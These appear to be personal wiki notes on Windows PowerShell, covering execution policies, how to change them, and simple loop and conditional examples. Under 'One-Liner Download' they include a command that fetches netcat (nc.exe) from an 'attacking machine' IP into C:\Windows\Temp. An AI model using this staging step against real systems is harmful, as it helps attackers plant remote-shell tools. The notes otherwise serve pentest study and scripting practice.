====== Windows PowerShell ======

===== Execution Policies =====

PowerShell (PS) execution policies determine your authorization to execute PS scripts or not: 
  - **Restricted:** [default] Blocks all use of PS scripts
  - **AllSigned:** Requires PS scripts to e signed by a trusted publisher
  - **RemoteSigned:** This is a common "normal" setting in many systems...
    - Allows any PS script written on the local machine.
    - But requires downloaded scripts to be signed by a trusted publisher.
  - **Unrestricted:** Allows any PS script but prompts you for confirmation on downloaded scripts.
  - **Bypass:** Allows any and all PS scripts. Have at it!

Syntax for changing the PowerShell execution policy: 

<code>
Set-ExecutionPolicy [name]
# Example:
Set-ExecutionPolicy RemoteSigned
</code>

----

===== Example Code =====

==== One-Liner Download ====

A very useful one-liner to download a file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name: 

<code>
(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe")
</code>

==== For Loop ====

<code>
Write-Host "Hello world!"

# Count up by one...
for ($var=1; $var -le 5; $var++)
{
    Write-Host "The value of var is: $var"
}

# Count up by two...
for ($var=0; $var -le 10; $var=$var+2)
{
    Write-Host "The value of var is: $var"
}
</code>

==== Conditional Stmt ====

<code>
$a = 2
if ( $a -gt 2 )
{
    Write-Host "The value $a is greater than 2."
}
elseif ( $a -eq 2 )
{
    Write-Host "The value $a is equal to 2."
}
else
{
    Write-Host ( "The value of $a is less than 2" + " or was not created or initialized." )
}
</code>